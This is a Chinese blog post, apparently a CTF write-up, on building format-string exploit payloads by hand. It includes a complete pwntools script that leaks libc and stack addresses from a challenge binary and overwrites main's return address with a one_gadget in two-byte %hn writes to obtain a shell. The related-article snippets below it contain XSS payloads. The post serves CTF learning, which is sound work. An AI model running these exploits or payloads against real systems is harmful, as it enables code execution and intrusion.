手动构造格式化字符串payload

最新推荐文章于 2024-05-24 21:48:03 发布
最新推荐文章于 2024-05-24 21:48:03 发布
阅读量982 收藏 19
点赞数 25
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79813730/article/details/136196576
版权
本文讲述了在遇到格式化字符串漏洞且自动payload生成受限时,如何手动构造payload修改栈地址,利用&和>>运算获取和修改特定字节,以实现地址操控和权限获取的过程。
摘要由CSDN通过智能技术生成

引言

我们平常遇到格式化字符串漏洞(要修改返回地址的),一般是利用pwntools去自动生成payload去修该返回地址,但当溢出字节不够时,或者p,s被禁用(hgame week1刚出)我们就需要去手动构造payload

这是我们pwntools自动生成的payload

 我们自己手动构造与这个原理是相同的

pay=(b'%'+str(要改成的数).encode()+b'c%13(要改的栈地址的偏移)$hn').ljust(0x28,b'\x00')+p64(stack)#stack是要修改的栈地址

 这里再补充一下知识点

hhn为单字节输出

hn为双字节输出

n为四字节输出

 就是:hhn一次改一个字节,hn一次更改两个字节,n一次更改四个字节

栈指针:a-b-c,只能改c

例题

 IDA分析,函数很简单,while(1)无限循环,明显存在格式化字符串漏洞,我们首先想到用格式化字符串漏洞去泄露函数地址利用libc,之后多次利用格式化字符串漏洞去更改地址为one_gadget

这里还需要补充一个知识点,因为我们一次只能更改两个字节,所以我们怎么去得到那两个字节呢

&运算

print(hex(one_gadget))

print(hex(one_gadget&0xff))

print(hex(one_gadget&0xffff))

>>运算

print(hex(one_gadget))

print(hex(one_gadget>>16))

##8为1字节,16为2字节

print(hex(one_gadget>>32))

找返回地址:

一般可修改的返回地址:printf的返回地址,fmt的返回地址,main函数的返回地址(libc_start_main)

printf的返回地址:pwndbg到printf函数si进入printf函数

 fmt的返回地址:

 main函数的返回地址(libc_start_main):

exp:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn1")
elf=ELF("./pwn1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
         gdb.attach(p)
         pause()
p.sendline(str(1))
p.recvuntil("lbs,lbs,lbs\n")
pay1=b'%45$p%47$p'
bug()
p.send(pay1)   
 
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-243-libc.sym['__libc_start_main']
p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(libc_base))
print(hex(stack))

one_gadget=libc_base+0xe3b01
print(hex(one_gadget))
print(hex(one_gadget>>16&0xffff))
print(hex(one_gadget>>32))
stack1=stack-560 #printf返回地址
stack2=stack-256 #fmt返回地址
stack3=stack2+0x10 #main返回地址

p.sendline(str(1))

p.recvuntil("lbs,lbs,lbs\n")
pay2=(b'%'+str(one_gadget&0xffff).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack3)

#修改尾两字节
#bug()
p.sendline(pay2)


p.sendline(str(1))
p.recvuntil("lbs,lbs,lbs\n")
pay3=(b'%'+str(one_gadget>>16&0xffff).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack3+2)

#修改中间两字节
p.sendline(pay3)


p.sendline(str(1))
p.recvuntil("lbs,lbs,lbs\n")
pay4=(b'%'+str(one_gadget>>32).encode()+b'c%13$hn').ljust(0x28,b'\x00')+p64(stack3+4)
bug()
p.sendline(pay4)
p.sendline("5")

p.interactive()

 获取权限

 

Thiroth
关注
  • 25
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss payload构造方法
weixin_48734687的博客
10-01 2339
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
生成payload
分享学习网络的点点滴滴
12-30 607
【代码】生成payload
SSTI的payload构造思路
shawdow_bug的博客
04-24 2010
内置的方法和属性 有些对象类型内置了一些可读属性,它们不会被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
栈上的格式化字符串漏洞【超详细,七种利用】(pwn入门)
2402_83422357的博客
05-24 1204
格式化字符串漏洞由于目前编译器的默认禁止敏感格式控制符,而且容易通过代码审计中发现,所以此类漏洞现在已经极少出现了。所以格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。格式化字符串漏洞最早被Tymm Twillman在1999年发现,当时并未引起重视。
攻下windows7第三天——构造payload
ploto_cs的博客
10-03 2658
一.实验背景 随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的! 二.实验环境 攻击机kali :192.168.126.129 靶机 win7:192.168.126.134 三.操作步骤 1.使用.exe作为web shell(关闭防火墙) (1)生成一个payload
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
01-27
在`printf`函数处下断点,利用格式化字符串的 `%n` 或其他方式来读取栈上的内存。通过计算偏移量,可以找出Canary相对于栈上其他已知地址的位置,从而泄露其值。 在实验中,通过输入`%59$x`,我们可以获取到Canary...
格式化串漏洞利用技术
03-10
2. **分析格式化字符串**:确定哪些格式化指示符是可控制的,以及它们如何影响内存操作。 3. **计算偏移量**:通过注入`%n`或其他方法,获取关键内存区域的地址。 4. **构造payload**:根据获取的信息,构造一个能够...
elf 加密 - 字符串加密 - 函数加密
最新发布
06-30
字符串加密 elf 加密项目,功能有:1)字符串加密(.rodata),2)函数加密 加密算法PRESENT(分组密码算法,速度快,实现简单。但可以通过差分分析破解,折中考虑),密钥由blake244生成(单向哈希,SHA-3备选,...
Fastboot模式刷写 Payload.bin格式工具 可视化图形
05-30
本篇将详细介绍“Fastboot模式刷写Payload.bin格式工具”以及与其相关的知识点。 首先,Payload.bin是一种特殊的文件格式,通常用于在Fastboot模式下执行刷机操作。这种格式的文件包含了设备固件更新所需的数据,...
Payload.bin格式解包+刷写工具
06-15
Payload.bin格式刷写工具 此工具非常方便 目前机型很多的官方卡刷包里都是Payload.bin格式的卡刷包 我们需要里面的某一个分区的haunt,使用这个工具非常简单就可以提取出来 也可以使用这个工具刷写 有需要的友友可以...
sql盲注----构造payload 让信息通过错误提示回显出来
weixin_42350229的博客
01-15 921
基于报错的sql盲注----构造payload 让信息通过错误提示回显出来 select 1, count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a,floot(rand(0)*2))a jfrom information_schema.columns group by a; //explain:此处有三个点,一是需要 concat 计数,二是...
【XSS】payload 常用构造和变形方法
吉吉的博客
03-06 1822
XSS 相关 payload 构造和变形的常用方法。
栈溢出利用之return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2081
return to dl-resolve payload构造原理
强大的XSS Payload
Killua
03-23 8905
1.构造post方式的html表单背景:某博客存在存储型xss漏洞操作:通过使用js脚本构造一个XSS Payload自动创建文章。实验的价值在于,只要成功了意味着可以模拟GET POST请求操作用户的浏览器。这在cookie劫持失败以后比较有用,如当受害者点击了恶意链接后,自己加载黑客的脚本,脚本模拟GET或者POST操作,这样就可以查看受害者的邮箱等待。实际上是模拟浏览器发送一个post给服务...
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6550
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 983
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1802
php命令执行基础与CTF例题分析
格式化字符串漏洞怎么测试偏移量
05-11
然后我们就可以构造一个格式化字符串,将我们的 payload 写入到目标变量的内存地址中: ``` payload = "%3$nAAAA" + p32(0xffffd5e8) ``` 其中 "%3$n" 将会把前面的 AAAA 写入到第三个参数指向的内存地址中,也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值